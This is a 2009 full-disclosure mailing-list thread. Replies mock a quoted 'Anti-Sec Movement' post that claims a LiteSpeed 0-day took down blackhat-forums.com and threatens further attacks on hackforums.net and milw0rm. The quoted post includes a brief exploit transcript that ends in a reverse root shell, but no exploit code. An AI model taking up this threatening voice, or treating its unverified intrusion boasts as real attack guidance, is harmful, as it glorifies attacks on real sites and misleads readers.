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Date: Thu, 16 Jul 2009 14:17:58 +0100
From: James Rankin <kz20fl@...glemail.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Anti-Sec - We have Terminated
	Blackhat-forums. Are you scared now HackForums?

Apparently N3tty has returned, or, God forbid, he has procreated

My money is on a return, given the Gmail addy

2009/7/16 Ant-Sec Movement <anti.sec.movement@...il.com>

> The Anti-Sec movement is not just one person. We are a group of people from
> all over the world. We are almost a culture unto ourselves. We are threaded
> throughout the spokes of everyday life.
> We have committed no crimes - our endeavors will ultimately cut down
> computer crime to some degree. The amount of innocent people getting hit
> with financial losses as a result of malicious computer hacking will
> decrease significantly because hacker communities like Blackhat-forums and
> Astalavista have been terminated - or at least for a time, which is still a
> gain.
>
> This is ultimately a hacker war.
>
> Furthermore, the Poster of this message is merely a standard bearer of a
> faction of the Anti-Sec Movement. The Poster of this message is not a
> hacker, but is merely reporting the movements of Anti-Sec.
>
> Sincerely,
>
> -anti-sec
>
> Please check out our website at: http://romeo.copyandpaste.info/
>
>
>
>
>
> On Thu, Jul 16, 2009 at 7:39 PM, Benjamin Cance <
> cance.consulting@...il.com> wrote:
>
>> Seriously, you're as delusional as these radical movements who blow up
>> buildings and kill people preaching how they feel the "West" is wrong
>> and old ways are best. I see a lot of parallels between them and you.
>> You need help, you need a new hobby. Taking down these sites is as
>> productive as masturbation. It feels good yes, but is it really that
>> satisfying? Nevermind that, you will do what you think is in your
>> "movement's" best interest.
>>
>> Regardless, I wish you well in your endeavors. Hope the FBI talk to you
>> eventually as you're infringing on the first amendment :)
>>
>> Ant-Sec Movement wrote:
>> > Blend in.
>> > Get trusted.
>> > Trust no one.
>> > Own everyone.
>> > Disclose nothing.
>> > Destroy everything.
>> > Take back the scene.
>> > Never sell out, never surrender.
>> > Get in as anonymous, Leave with no trace.
>> >
>> > ------------------------------
>> >
>> > Dear Jesse Labrocca (Omniscient) and Hackforums.net,
>> >
>> > The Anti-Sec movement has officially terminated Blackhat-forums.com
>> > using yet ANOTHER 0-day exploit that we have discovered. This one
>> > takes advantage of a previously undisclosed LiteSpeed vulnerability.
>> > This is primarily to prove that we are serious and committed to our
>> > primary goal - eradicating full-disclosure of computer vulnerabilities
>> > and exploits, and terminating general discussion of hacking for any
>> > n00b and script-kiddie to read and review - and learn from.
>> >
>> > The Anti-Sec movement hopes Hackrforums.net now understands that our
>> > cyber war against you is NOT a joke. We will be terminating
>> > Hackforums.net. You are our number one target...we want to savor the
>> > moment and the suspense. We will strike when you least expect it. This
>> > we promise.
>> >
>> > Here is a brief transcript of the hacking of Blackhat-forums.com:
>> >
>> > -----------------------------------------------------------------
>> >
>> > anti-sec:~/pwn# ./litespeed_0day -t blackhat-forums.com
>> > <http://blackhat-forums.com> -p80
>> >
>> > [+] Connecting to blackhat-forums.com:80 <http://blackhat-forums.com:80
>> >
>> > [+] Connected Successfully!
>> > [+] Checking for Lightspeed vulnerability...
>> > [+] Vulnerable!
>> > [+] Sending exploit
>> > [-] Phase 1
>> > [-] Phase 2
>> > [-] Phase 3
>> > [+] Injecting Shellcode...
>> > [+] Waiting for reverse shell...
>> >
>> > [~] Connected to shell @ 74.86.203.65!
>> >
>> > <snip>
>> >
>> > uid=0(root) gid=0 (root) groups=0 (root)
>> >
>> > <snip>
>> >
>> > -----------------------------------------------------------
>> >
>> > By terminating Blackhat-forums.com, we have furthered our goals in
>> > more ways than one.
>> >
>> > We are coming for you hackforums.net...and Milw0rm.com. We haven't
>> > forgotten you, Milw0rm. Our juicy Apache 0-day will terminate both
>> > websites, which will cause a major blow to those who support
>> > full-disclosure of hacking related information.
>> >
>> > "Take out two birds with one stone."
>> >
>> > Sincerely,
>> >
>> > -anti-sec
>> > ------------------------------------------------------------------------
>> >
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>
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